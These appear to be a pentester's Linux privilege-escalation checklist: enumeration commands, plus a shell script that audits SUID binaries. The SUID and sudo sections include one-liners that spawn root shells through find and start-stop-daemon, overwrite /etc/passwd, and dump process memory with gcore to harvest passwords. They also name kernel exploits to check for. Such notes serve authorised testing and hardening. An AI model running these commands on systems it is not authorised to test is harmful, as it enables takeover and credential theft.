Linux Enumeration

Check local environment:

env

Check Version, issue, architecture:

cat /etc/issue
cat /proc/version
uname -r
uname -a
arch

Check sudo and GTFOBins:

sudo -l

Networks running:

ss -antp

Processes:

ps aux

Unprivileged Process Monitoring:

Check for shell:

echo $SHELL

Check for SUID binaries:

find / -perm -u=s -type f 2>/dev/null
  • /usr/bin/find --> find . -exec /bin/sh -p \; -quit

  • /usr/bin/dosbox --> privesc using x11/vnc

  • /usr/bin/cp -> cp passwd.orig /etc/passwd

  • /usr/bin/start-stop-daemon -> /usr/sbin/start-stop-daemon -n foo -S -x /bin/sh -- -p
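
For the audit side of the SUID check above, an added example (not part of the original notes) that sorts the output of the find command into the binaries listed here, an expected baseline, and everything else. The baseline list, the function names and the sample paths are assumptions made for the example.

```shell
#!/bin/sh
# Added example: classify SUID binaries for a defender's audit.
# Input: one path per line, e.g. from
#   find / -perm -u=s -type f 2>/dev/null | classify_suid

# Binaries these notes list as abusable when SUID.
RISKY_SUID="find dosbox cp start-stop-daemon"
# Assumption: SUID binaries expected on a stock install; tune per distro.
EXPECTED_SUID="passwd su sudo mount umount chsh chfn newgrp gpasswd"

# Print "<VERDICT><TAB><path>" for every path read from stdin.
classify_suid() {
    # "|| [ -n ... ]" keeps a final line that lacks a trailing newline.
    while IFS= read -r path || [ -n "$path" ]; do
        if [ -z "$path" ]; then continue; fi
        name=${path##*/}
        case " $RISKY_SUID " in
            *" $name "*) verdict=RISKY ;;
            *) case " $EXPECTED_SUID " in
                   *" $name "*) verdict=EXPECTED ;;
                   *) verdict=REVIEW ;;   # unknown SUID file: inspect by hand
               esac ;;
        esac
        printf '%s\t%s\n' "$verdict" "$path"
    done
}

# Count lines of classify_suid output that carry verdict $1.
count_verdict() {
    awk -F'\t' -v v="$1" '$1 == v { n++ } END { print n + 0 }'
}

# Constructed sample of find output (not taken from a real host).
SAMPLE_SUID='/usr/bin/passwd
/usr/bin/find
/usr/bin/cp
/usr/sbin/start-stop-daemon
/opt/vendor/bin/helper
/usr/bin/sudo'

printf '%s\n' "$SAMPLE_SUID" | classify_suid | sort
```

RISKY entries should have the SUID bit removed unless there is a documented need for it; REVIEW entries are files outside both lists and need a manual look.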

Sudo:

Enum:

sudo -l
sudo --version
id

Look for:

ALL=(ALL) NOPASSWD:
/usr/bin/gcore -> sudo gcore PID (try password-store) -> strings gcore.output

Readers:
vi ->
nano -> 
ed -> 

Look for:

- Dirty COW

- PwnKit

- Polkit

- Dirty Pipe
